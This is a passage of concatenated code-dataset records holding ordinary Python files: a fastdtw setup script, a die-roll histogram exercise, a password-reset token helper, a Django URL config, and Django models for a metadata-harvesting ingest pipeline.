'fastdtw._fastdtw',\n [os.path.join('fastdtw', \"_fastdtw.pyx\")],\n language=\"c++\",\n include_dirs=[],\n libraries=[\"stdc++\"]\n )]\n\nkwargs = {\n 'name': 'fastdtw',\n 'version': '0.3.0',\n 'author': 'Kazuaki Tanida',\n 'url': 'https://github.com/slaypni/fastdtw',\n 'description': 'Dynamic Time Warping (DTW) algorithm with an O(N) time and memory complexity.',\n 'license': 'MIT',\n 'keywords': ['dtw'],\n 'install_requires': ['numpy'],\n 'packages': find_packages(),\n 'ext_modules': extensions,\n 'test_suite': 'tests',\n 'setup_requires': ['pytest-runner'],\n 'tests_require': ['pytest'],\n 'classifiers': classifiers\n}\n\ntry:\n setup(**kwargs)\nexcept SystemExit:\n del kwargs['ext_modules']\n warnings.warn('compilation failed. Installing pure python package')\n setup(**kwargs)\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1198, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "setuptools.Extension", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 15, "usage_type": "name"}, {"api_name": "setuptools.find_packages", "line_number": 30, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 39, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 42, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "137787049", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 7 09:27:08 2017\n\n@author: newuser\n\"\"\"\n\nimport random, pylab\nfrom matplotlib import pyplot, pylab\n\n# You are given this function\ndef getMeanAndStd(X):\n mean = sum(X)/float(len(X))\n tot = 0.0\n for x in X:\n tot += (x - mean)**2\n std = (tot/len(X))**0.5\n return mean, std\n\n# You are given this class\nclass Die(object):\n def __init__(self, valList):\n \"\"\" valList is not empty \"\"\"\n self.possibleVals = valList[:]\n def roll(self):\n return random.choice(self.possibleVals)\n\n# Implement this -- Coding Part 1 of 2\ndef makeHistogram(values, numBins, xLabel, yLabel, title=None):\n \"\"\"\n - values, a sequence of numbers\n - numBins, a positive int\n - xLabel, yLabel, title, are strings\n - Produces a histogram of values with numBins bins and the indicated labels\n for the x and y axis\n - If title is provided by caller, puts that title on the figure and otherwise\n does not title the figure\n \"\"\"\n \n\n pylab.hist(values, bins = numBins)\n\n pylab.xlabel(xLabel)\n pylab.ylabel(yLabel)\n\n if title != None:\n pylab.title(title)\n\n pylab.show()\n \n#makeHistogram([21,20,19,1,2,2,2,5,6,6,9,10], 5, \"Aaaaa\", \"Bbbbb\", \"Ccccc\")\n \n# Implement this -- Coding Part 2 of 2\ndef getAverage1(die, numRolls, numTrials):\n \"\"\"\n - die, a Die\n - numRolls, numTrials, are positive ints\n - Calculates the expected mean value of the longest run of a number\n over numTrials runs of numRolls rolls.\n - Calls makeHistogram to produce a histogram of the longest runs for all\n the trials. There should be 10 bins in the histogram\n - Choose appropriate labels for the x and y axes.\n - Returns the mean calculated\n \"\"\"\n \n results = []\n mean_list = []\n \n for trial in range(numTrials):\n roll_list = []\n best_run = (0,0)\n \n for roll in range(numRolls):\n roll_list.append(die.roll())\n \n for i in roll_list:\n candidate = (i, roll_list.count(i))\n if candidate[1] > best_run[1]:\n best_run = candidate\n \n for i in range(best_run[1]): \n mean_list.append(best_run[0])\n \n results.append(best_run[0])\n \n# mean_list.append(sum(roll_list)/len(roll_list))\n print(roll_list)\n\n print(mean_list)\n print(results)\n \n makeHistogram(results, numBins = 10, xLabel = 'Longest run', yLabel = '# occurances')\n \n# return sum(mean_list)/len(mean_list)\n return sum(mean_list)/len(mean_list)\n\n\ndef getAverage(die, numRolls, numTrials):\n \"\"\"\n - die, a Die\n - numRolls, numTrials, are positive ints\n - Calculates the expected mean value of the longest run of a number\n over numTrials runs of numRolls rolls.\n - Calls makeHistogram to produce a histogram of the longest runs for all\n the trials. There should be 10 bins in the histogram\n - Choose appropriate labels for the x and y axes.\n - Returns the mean calculated\n \"\"\"\n\n longest_runs = []\n\n for trial in range(numTrials):\n die_rolls = {}\n counter = 1\n \n last_roll = None\n \n for each in die.possibleVals:\n die_rolls[each] = 0\n \n for roll in range(numRolls):\n new_roll = die.roll()\n if new_roll != last_roll:\n counter = 1\n else:\n counter += 1\n if counter > die_rolls[new_roll]:\n die_rolls[new_roll] = counter\n\n last_roll = new_roll\n\n\n longest_runs.append(max(die_rolls.values()))\n# print(die_rolls)\n\n \n makeHistogram(longest_runs, numBins = 10, xLabel = 'Longest run', yLabel = '# occurances')\n# print(longest_runs)\n return sum(longest_runs)/len(longest_runs)\n \n \n \n# One test case\n\n#print(getAverage(Die([1,2,3,4,5,6,6,6,7]), 500, 10000))\n#5.312\n\n#print(getAverage(Die([1,2,3,4,5,6,6,6,7]), 5, 100))\n#?\n\n#print(getAverage(Die([1]), 10, 1000))\n#10.0\n\n#print(getAverage(Die([1,1]), 10, 1000))\n#10.0\n\n#print(getAverage(Die([1,2,3,4,5,6,6,6,7]), 1, 1000))\n#1\n\n#print(getAverage(Die([1,2,3,4,5,6]), 50, 1000))\n#?\n\n\n\n##only use pylab.hist, pylab.title, pylab.xlabel, pylab.ylabel, pylab.show", "sub_path": "Final/die.py", "file_name": "die.py", "file_ext": "py", "file_size_in_byte": 4391, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.choice", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pylab.hist", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pylab.xlabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pylab.ylabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pylab.title", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pylab.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pylab", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "274849438", "text": "\"\"\"Tools for building and working with password-reset tokens.\n\nThis file is a modified version of a similar one in Flask-User and the original\nhas the following copyright information:\n :copyright: (c) 2013 by Ling Thio\n :author: Ling Thio (ling.thio@gmail.com)\n :license: Simplified BSD License, see LICENSE.txt for more details.\n\"\"\"\n\nimport base64\nfrom cryptography.hazmat.primitives.ciphers import (\n Cipher,\n algorithms as cipher_algos,\n modes as cipher_modes,\n)\nfrom cryptography.hazmat.backends import default_backend as crypto_backend\nfrom itsdangerous import BadSignature, SignatureExpired, TimestampSigner\n\n\nclass TokenManager(object):\n def __init__(self, secret, timestamp_signer=TimestampSigner):\n # Create cypher to encrypt IDs and ensure >=16 characters\n\n key = secret\n if not isinstance(key, bytes):\n key = secret.encode(\"utf-8\")\n if len(key) < 16:\n raise ValueError('Key must be at least 16 bytes long')\n self.cipher = Cipher(cipher_algos.AES(key[:16]), cipher_modes.ECB(), crypto_backend())\n self.signer = timestamp_signer(secret)\n\n def encrypt(self, data):\n \"\"\"Encrypts data to url-safe base64 string.\"\"\"\n padded = data + (b' ' * (16 - (len(data) % 16)))\n encryptor = self.cipher.encryptor()\n encrypted = encryptor.update(padded)\n base64ed = base64.urlsafe_b64encode(encrypted) # URL safe base64 string with '=='\n return base64ed[0:-2] # base64 string without '=='\n\n def decrypt(self, encrypted_data):\n \"\"\"Decrypts url-safe base64 string to original data.\n\n :param encrypted_data: must be bytes.\n \"\"\"\n try:\n base64ed = encrypted_data + b'==' # base64 string with '=='\n encrypted = base64.urlsafe_b64decode(base64ed) # encrypted data\n decryptor = self.cipher.decryptor()\n padded = decryptor.update(encrypted)\n return padded.strip()\n except Exception as e: # pragma: no cover\n print('!!!Exception in decrypt!!!:', e)\n return None\n\n def generate_token(self, data):\n \"\"\"Return token with data, timestamp, and signature\"\"\"\n # In Python3 we must make sure that bytes are converted to strings.\n # Hence the addition of '.decode()'\n return self.signer.sign(self.encrypt(data)).decode()\n\n def verify_token(self, token, expiration_timedelta):\n \"\"\"Verify token and return (has_expired, data).\n\n :param token: is the full token string as generated by `generate_token`.\n :param expiration_timedelta: is a `datetime.timedelta` describing how old the toen\n may be.\n\n :returns: `(False, data)` on success.\n `(False, None)` on bad data.\n `(True, None)` on expired token.\n \"\"\"\n try:\n data = self.signer.unsign(token, max_age=expiration_timedelta.total_seconds())\n return (False, self.decrypt(data))\n except SignatureExpired:\n return (True, None)\n except BadSignature:\n return (False, None)\n", "sub_path": "keg_bouncer/tokens.py", "file_name": "tokens.py", "file_ext": "py", "file_size_in_byte": 3181, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "itsdangerous.TimestampSigner", "line_number": 21, "usage_type": "name"}, {"api_name": "cryptography.hazmat.primitives.ciphers.Cipher", "line_number": 29, "usage_type": "call"}, {"api_name": "cryptography.hazmat.primitives.ciphers.algorithms.AES", "line_number": 29, "usage_type": "call"}, {"api_name": "cryptography.hazmat.primitives.ciphers.algorithms", "line_number": 29, "usage_type": "name"}, {"api_name": "cryptography.hazmat.primitives.ciphers.modes.ECB", "line_number": 29, "usage_type": "call"}, {"api_name": "cryptography.hazmat.primitives.ciphers.modes", "line_number": 29, "usage_type": "name"}, {"api_name": "cryptography.hazmat.backends.default_backend", "line_number": 29, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64encode", "line_number": 37, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64decode", "line_number": 47, "usage_type": "call"}, {"api_name": "itsdangerous.SignatureExpired", "line_number": 75, "usage_type": "name"}, {"api_name": "itsdangerous.BadSignature", "line_number": 77, "usage_type": "name"}]} +{"seq_id": "195181301", "text": "from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n url(r'^$', include('apps.home.urls')),\n url(r'^feed/(.*)/', include('apps.feed.urls')),\n url(r'^feed/(.*)/json', include('apps.feed_json.urls')),\n url(r'^sidepanel/$', include('apps.side_panel.urls')),\n url(r'^admin/', include(admin.site.urls)),\n)\n", "sub_path": "Feed/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 397, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "285896218", "text": "import contextlib\nimport datetime\nimport logging\nfrom typing import Optional\n\nfrom django.core import validators\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import Storage\nfrom django.db import DEFAULT_DB_ALIAS\nfrom django.db import connection\nfrom django.db import connections\nfrom django.db import models\nfrom django.db.models.functions import Coalesce\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.utils.deconstruct import deconstructible\n\nfrom share.models.fields import EncryptedJSONField\nfrom share.models.fuzzycount import FuzzyCountManager\nfrom share.util import chunked, placeholders, BaseJSONAPIMeta\nfrom share.util.extensions import Extensions\n\n\nlogger = logging.getLogger(__name__)\n__all__ = ('Source', 'RawDatum', 'SourceConfig', 'Harvester', 'Transformer', 'SourceUniqueIdentifier')\n\n\nclass SourceIcon(models.Model):\n source_name = models.TextField(unique=True)\n image = models.BinaryField()\n\n\n@deconstructible\nclass SourceIconStorage(Storage):\n def _open(self, name, mode='rb'):\n assert mode == 'rb'\n icon = SourceIcon.objects.get(source_name=name)\n return ContentFile(icon.image)\n\n def _save(self, name, content):\n SourceIcon.objects.update_or_create(source_name=name, defaults={'image': content.read()})\n return name\n\n def delete(self, name):\n SourceIcon.objects.get(source_name=name).delete()\n\n def get_available_name(self, name, max_length=None):\n return name\n\n def url(self, name):\n return reverse('source_icon', kwargs={'source_name': name})\n\n\ndef icon_name(instance, filename):\n return instance.name\n\n\nclass NaturalKeyManager(models.Manager):\n use_in_migrations = True\n\n def __init__(self, *key_fields):\n super(NaturalKeyManager, self).__init__()\n self.key_fields = key_fields\n\n def get_by_natural_key(self, key):\n return self.get(**dict(zip(self.key_fields, key)))\n\n\nclass Source(models.Model):\n name = models.TextField(unique=True)\n long_title = models.TextField(unique=True)\n home_page = models.URLField(null=True, blank=True)\n icon = models.ImageField(upload_to=icon_name, storage=SourceIconStorage(), blank=True)\n is_deleted = models.BooleanField(default=False)\n\n # Whether or not this SourceConfig collects original content\n # If True changes made by this source cannot be overwritten\n # This should probably be on SourceConfig but placing it on Source\n # is much easier for the moment.\n # I also haven't seen a situation where a Source has two feeds that we harvest\n # where one provider unreliable metadata but the other does not.\n canonical = models.BooleanField(default=False, db_index=True)\n\n # TODO replace with object permissions, allow multiple sources per user (SHARE-996)\n user = models.OneToOneField('ShareUser', null=True, on_delete=models.CASCADE)\n\n objects = NaturalKeyManager('name')\n\n class JSONAPIMeta(BaseJSONAPIMeta):\n pass\n\n def natural_key(self):\n return (self.name,)\n\n def __repr__(self):\n return '<{}({}, {}, {})>'.format(self.__class__.__name__, self.pk, self.name, self.long_title)\n\n def __str__(self):\n return repr(self)\n\n\nclass SourceConfigManager(NaturalKeyManager):\n def get_or_create_push_config(self, user, transformer_key):\n config_label = '{}.{}'.format(user.username, transformer_key)\n try:\n return SourceConfig.objects.get(label=config_label)\n except SourceConfig.DoesNotExist:\n source, _ = Source.objects.get_or_create(\n user=user,\n defaults={\n 'name': user.username,\n 'long_title': user.username,\n }\n )\n config, _ = SourceConfig.objects.get_or_create(\n label=config_label,\n defaults={\n 'source': source,\n 'transformer': Transformer.objects.get(key=transformer_key),\n }\n )\n return config\n\n\nclass SourceConfig(models.Model):\n # Previously known as the provider's app_label\n label = models.TextField(unique=True)\n version = models.PositiveIntegerField(default=1)\n\n source = models.ForeignKey('Source', on_delete=models.CASCADE, related_name='source_configs')\n base_url = models.URLField(null=True)\n earliest_date = models.DateField(null=True, blank=True)\n rate_limit_allowance = models.PositiveIntegerField(default=5)\n rate_limit_period = models.PositiveIntegerField(default=1)\n\n # Allow null for push sources\n harvester = models.ForeignKey('Harvester', null=True, on_delete=models.CASCADE)\n harvester_kwargs = models.JSONField(null=True, blank=True)\n harvest_interval = models.DurationField(default=datetime.timedelta(days=1))\n harvest_after = models.TimeField(default='02:00')\n full_harvest = models.BooleanField(default=False, help_text=(\n 'Whether or not this SourceConfig should be fully harvested. '\n 'Requires earliest_date to be set. '\n 'The schedule harvests task will create all jobs necessary if this flag is set. '\n 'This should never be set to True by default. '\n ))\n\n # Allow null for push sources\n # TODO put pushed data through a transformer, add a JSONLDTransformer or something for backward compatibility\n transformer = models.ForeignKey('Transformer', null=True, on_delete=models.CASCADE)\n transformer_kwargs = models.JSONField(null=True, blank=True)\n\n regulator_steps = models.JSONField(null=True, blank=True)\n\n disabled = models.BooleanField(default=False)\n\n private_harvester_kwargs = EncryptedJSONField(blank=True, null=True)\n private_transformer_kwargs = EncryptedJSONField(blank=True, null=True)\n\n objects = SourceConfigManager('label')\n\n class JSONAPIMeta(BaseJSONAPIMeta):\n pass\n\n def natural_key(self):\n return (self.label,)\n\n def get_harvester(self, **kwargs):\n \"\"\"Return a harvester instance configured for this SourceConfig.\n\n **kwargs: passed to the harvester's initializer\n \"\"\"\n return self.harvester.get_class()(self, **kwargs)\n\n def get_transformer(self, **kwargs):\n \"\"\"Return a transformer instance configured for this SourceConfig.\n\n **kwargs: passed to the transformer's initializer\n \"\"\"\n return self.transformer.get_class()(self, **kwargs)\n\n @contextlib.contextmanager\n def acquire_lock(self, required=True, using='default'):\n from share.harvest.exceptions import HarvesterConcurrencyError\n\n # NOTE: Must be in transaction\n logger.debug('Attempting to lock %r', self)\n with connections[using].cursor() as cursor:\n cursor.execute(\"SELECT pg_try_advisory_lock(%s::regclass::integer, %s);\", (self._meta.db_table, self.id))\n locked = cursor.fetchone()[0]\n if not locked and required:\n logger.warning('Lock failed; another task is already harvesting %r.', self)\n raise HarvesterConcurrencyError('Unable to lock {!r}'.format(self))\n elif locked:\n logger.debug('Lock acquired on %r', self)\n else:\n logger.warning('Lock not acquired on %r', self)\n try:\n yield\n finally:\n if locked:\n cursor.execute(\"SELECT pg_advisory_unlock(%s::regclass::integer, %s);\", (self._meta.db_table, self.id))\n logger.debug('Lock released on %r', self)\n\n def __repr__(self):\n return '<{}({}, {})>'.format(self.__class__.__name__, self.pk, self.label)\n\n __str__ = __repr__\n\n\nclass Harvester(models.Model):\n key = models.TextField(unique=True)\n date_created = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n objects = NaturalKeyManager('key')\n\n @property\n def version(self):\n return self.get_class().VERSION\n\n def natural_key(self):\n return (self.key,)\n\n def get_class(self):\n return Extensions.get('share.harvesters', self.key)\n\n def __repr__(self):\n return '<{}({}, {})>'.format(self.__class__.__name__, self.pk, self.key)\n\n def __str__(self):\n return repr(self)\n\n\nclass Transformer(models.Model):\n key = models.TextField(unique=True)\n date_created = models.DateTimeField(auto_now_add=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n objects = NaturalKeyManager('key')\n\n @property\n def version(self):\n return self.get_class().VERSION\n\n def natural_key(self):\n return (self.key,)\n\n def get_class(self):\n return Extensions.get('share.transformers', self.key)\n\n def __repr__(self):\n return '<{}({}, {})>'.format(self.__class__.__name__, self.pk, self.key)\n\n def __str__(self):\n return repr(self)\n\n\nclass SourceUniqueIdentifier(models.Model):\n identifier = models.TextField()\n source_config = models.ForeignKey('SourceConfig', on_delete=models.CASCADE)\n\n class JSONAPIMeta(BaseJSONAPIMeta):\n pass\n\n class Meta:\n unique_together = ('identifier', 'source_config')\n\n @property\n def ingest_job(self):\n \"\"\"fetch the most recent IngestJob for this suid\n\n (hopefully) temporary -- will be replaced by the inverse relation of a OneToOneField on IngestJob\n \"\"\"\n return self.ingest_jobs.order_by(\n Coalesce('date_started', 'date_created').desc(nulls_last=True)\n ).first()\n\n def most_recent_raw_datum(self):\n \"\"\"fetch the most recent RawDatum for this suid\n \"\"\"\n return self.raw_data.order_by(\n Coalesce('datestamp', 'date_created').desc(nulls_last=True)\n ).first()\n\n def get_date_first_seen(self) -> Optional[datetime.datetime]:\n \"\"\"when the first RawDatum for this suid was added\n \"\"\"\n return (\n self.raw_data\n .order_by('date_created')\n .values_list('date_created', flat=True)\n .first()\n )\n\n def __repr__(self):\n return '<{}({}, {}, {!r})>'.format('Suid', self.id, self.source_config.label, self.identifier)\n\n __str__ = __repr__\n\n\nclass RawDatumManager(FuzzyCountManager):\n\n def link_to_job(self, job, datum_ids):\n if not datum_ids:\n return True\n logger.debug('Linking RawData to %r', job)\n with connection.cursor() as cursor:\n for chunk in chunked(datum_ids, size=500):\n if not chunk:\n break\n cursor.execute('''\n INSERT INTO \"{table}\"\n (\"{rawdatum}\", \"{harvestjob}\")\n VALUES\n {values}\n ON CONFLICT (\"{rawdatum}\", \"{harvestjob}\") DO NOTHING;\n '''.format(\n values=', '.join('%s' for _ in range(len(chunk))), # Nasty hack. Fix when psycopg2 2.7 is released with execute_values\n table=RawDatum.jobs.through._meta.db_table,\n rawdatum=RawDatum.jobs.through._meta.get_field('rawdatum').column,\n harvestjob=RawDatum.jobs.through._meta.get_field('harvestjob').column,\n ), [(raw_id, job.id) for raw_id in chunk])\n return True\n\n def store_chunk(self, source_config, data, limit=None, db=DEFAULT_DB_ALIAS):\n \"\"\"Store a large amount of data for a single source_config.\n\n Data MUST be a utf-8 encoded string (Just a str type).\n Take special care to make sure you aren't destroying data by mis-encoding it.\n\n Args:\n source_config (SourceConfig):\n data Generator[FetchResult]:\n\n Returns:\n Generator[RawDatum]\n \"\"\"\n hashes = {}\n identifiers = {}\n now = timezone.now()\n\n if limit == 0:\n return []\n\n for chunk in chunked(data, 500):\n if not chunk:\n break\n\n new = []\n new_identifiers = set()\n for fr in chunk:\n if limit and len(hashes) >= limit:\n break\n\n if fr.sha256 in hashes:\n if hashes[fr.sha256] != fr.identifier:\n raise ValueError(\n '{!r} has already been seen or stored with identifier \"{}\". '\n 'Perhaps your identifier extraction is incorrect?'.format(fr, hashes[fr.sha256])\n )\n logger.warning('Recieved duplicate datum %s from %s', fr, source_config)\n continue\n\n new.append(fr)\n hashes[fr.sha256] = fr.identifier\n new_identifiers.add(fr.identifier)\n\n if new_identifiers:\n suids = SourceUniqueIdentifier.objects.raw('''\n INSERT INTO \"{table}\"\n (\"{identifier}\", \"{source_config}\")\n VALUES\n {values}\n ON CONFLICT\n (\"{identifier}\", \"{source_config}\")\n DO UPDATE SET\n id = \"{table}\".id\n RETURNING {fields}\n '''.format(\n table=SourceUniqueIdentifier._meta.db_table,\n identifier=SourceUniqueIdentifier._meta.get_field('identifier').column,\n source_config=SourceUniqueIdentifier._meta.get_field('source_config').column,\n values=placeholders(len(new_identifiers)), # Nasty hack. Fix when psycopg2 2.7 is released with execute_values\n fields=', '.join('\"{}\"'.format(field.column) for field in SourceUniqueIdentifier._meta.concrete_fields),\n ), [(identifier, source_config.id) for identifier in new_identifiers])\n\n for suid in suids:\n identifiers[suid.identifier] = suid.pk\n\n if new:\n # Defer 'datum' by omitting it from the returned fields\n yield from RawDatum.objects.raw(\n '''\n INSERT INTO \"{table}\"\n (\"{suid}\", \"{hash}\", \"{datum}\", \"{datestamp}\", \"{date_modified}\", \"{date_created}\")\n VALUES\n {values}\n ON CONFLICT\n (\"{suid}\", \"{hash}\")\n DO UPDATE SET\n \"{datestamp}\" = EXCLUDED.\"{datestamp}\",\n \"{date_modified}\" = EXCLUDED.\"{date_modified}\"\n RETURNING id, \"{suid}\", \"{hash}\", \"{datestamp}\", \"{date_modified}\", \"{date_created}\"\n '''.format(\n table=RawDatum._meta.db_table,\n suid=RawDatum._meta.get_field('suid').column,\n hash=RawDatum._meta.get_field('sha256').column,\n datum=RawDatum._meta.get_field('datum').column,\n datestamp=RawDatum._meta.get_field('datestamp').column,\n date_modified=RawDatum._meta.get_field('date_modified').column,\n date_created=RawDatum._meta.get_field('date_created').column,\n values=', '.join('%s' for _ in range(len(new))), # Nasty hack. Fix when psycopg2 2.7 is released with execute_values\n ), [\n (identifiers[fr.identifier], fr.sha256, fr.datum, fr.datestamp or now, now, now)\n for fr in new\n ]\n )\n\n if limit and len(hashes) >= limit:\n break\n\n def store_data(self, config, fetch_result):\n \"\"\"\n \"\"\"\n (rd, ) = self.store_chunk(config, [fetch_result])\n\n if rd.created:\n logger.debug('New %r', rd)\n else:\n logger.debug('Found existing %r', rd)\n\n return rd\n\n\n# Explicit through table to match legacy names\nclass RawDatumJob(models.Model):\n datum = models.ForeignKey('RawDatum', db_column='rawdatum_id', on_delete=models.CASCADE)\n job = models.ForeignKey('HarvestJob', db_column='harvestlog_id', on_delete=models.CASCADE)\n\n class Meta:\n db_table = 'share_rawdatum_logs'\n\n\nclass RawDatum(models.Model):\n\n datum = models.TextField()\n\n suid = models.ForeignKey(SourceUniqueIdentifier, on_delete=models.CASCADE, related_name='raw_data')\n\n # The sha256 of the datum\n sha256 = models.TextField(validators=[validators.MaxLengthValidator(64)])\n\n datestamp = models.DateTimeField(null=True, help_text=(\n 'The most relevant datetime that can be extracted from this RawDatum. '\n 'This may be, but is not limited to, a deletion, modification, publication, or creation datestamp. '\n 'Ideally, this datetime should be appropriate for determining the chronological order its data will be applied.'\n ))\n\n date_modified = models.DateTimeField(auto_now=True, editable=False)\n date_created = models.DateTimeField(auto_now_add=True, editable=False)\n\n no_output = models.BooleanField(null=True, help_text=(\n 'Indicates that this RawDatum resulted in an empty graph when transformed. '\n 'This allows the RawDataJanitor to find records that have not been processed. '\n 'Records that result in an empty graph will not have a NormalizedData associated with them, '\n 'which would otherwise look like data that has not yet been processed.'\n ))\n\n jobs = models.ManyToManyField('HarvestJob', related_name='raw_data', through=RawDatumJob)\n\n objects = RawDatumManager()\n\n @property\n def created(self):\n return self.date_modified == self.date_created\n\n class Meta:\n unique_together = ('suid', 'sha256')\n verbose_name_plural = 'Raw Data'\n indexes = [\n models.Index(fields=['no_output'], name='share_rawda_no_outp_f0330f_idx'),\n ]\n\n class JSONAPIMeta(BaseJSONAPIMeta):\n resource_name = 'RawData'\n\n def __repr__(self):\n return '<{}({}, {}, {}...)>'.format(self.__class__.__name__, self.id, self.datestamp, self.sha256[:10])\n\n __str__ = __repr__\n", "sub_path": "share/models/ingest.py", "file_name": "ingest.py", "file_ext": "py", "file_size_in_byte": 18228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.BinaryField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.core.files.storage.Storage", "line_number": 34, "usage_type": "name"}, {"api_name": "django.core.files.base.ContentFile", "line_number": 38, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 51, "usage_type": "call"}, {"api_name": "django.utils.deconstruct.deconstructible", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 58, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 58, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 69, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 69, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 70, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 70, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 71, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 71, "usage_type": "name"}, {"api_name": "django.db.models.URLField", "line_number": 72, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 72, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 73, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 73, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 74, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 74, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 82, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 82, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 85, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 85, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 85, "usage_type": "attribute"}, {"api_name": "share.util.BaseJSONAPIMeta", "line_number": 89, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 125, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 125, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 127, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 127, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 128, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 128, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 130, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 130, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 130, "usage_type": "attribute"}, {"api_name": "django.db.models.URLField", "line_number": 131, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 131, "usage_type": "name"}, {"api_name": "django.db.models.DateField", "line_number": 132, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 132, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 133, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 133, "usage_type": "name"}, {"api_name": "django.db.models.PositiveIntegerField", "line_number": 134, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 134, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 137, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 137, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 137, "usage_type": "attribute"}, {"api_name": "django.db.models.JSONField", "line_number": 138, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 138, "usage_type": "name"}, {"api_name": "django.db.models.DurationField", "line_number": 139, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 139, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 139, "usage_type": "call"}, {"api_name": "django.db.models.TimeField", "line_number": 140, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 140, "usage_type": "name"}, 